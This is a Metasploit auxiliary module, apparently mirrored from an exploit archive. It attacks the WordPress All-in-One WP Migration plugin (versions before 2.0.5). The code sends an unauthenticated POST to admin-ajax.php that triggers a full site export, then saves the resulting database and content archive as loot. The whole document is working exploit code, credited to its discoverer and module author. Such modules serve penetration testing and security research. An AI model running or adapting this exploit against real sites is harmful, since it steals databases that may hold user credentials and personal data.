## https://sploitus.com/exploit?id=PACKETSTORM:180686
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress All-in-One Migration Export',
'Description' => %q{
This module allows you to export Wordpress data (such as the database, plugins, themes,
uploaded files, etc) via the All-in-One Migration plugin without authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Golovich', # Disclosure
'rastating' # Metasploit module
],
'References' =>
[
['WPVDB', '7857'],
['URL', 'https://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability']
],
'DisclosureDate' => '2015-03-19'
))
register_options(
[
OptInt.new('MAXTIME', [ true, 'The maximum number of seconds to wait for the export to complete', 300 ])
])
end
def check
check_plugin_version_from_readme('all-in-one-wp-migration', '2.0.5')
end
def run
print_status("Requesting website export...")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_get' => { 'action' => 'router' },
'vars_post' => { 'options[action]' => 'export' }
}, datastore['MAXTIME'])
unless res
fail_with(Failure::Unknown, "#{peer} - No response from the target")
end
if res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Server responded with status code #{res.code}")
end
if res.body.blank?
print_status("Unable to download anything.")
print_status("Either the target isn't actually vulnerable, or")
print_status("it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.")
else
store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup')
print_good("Backup archive saved to #{store_path}")
end
end
end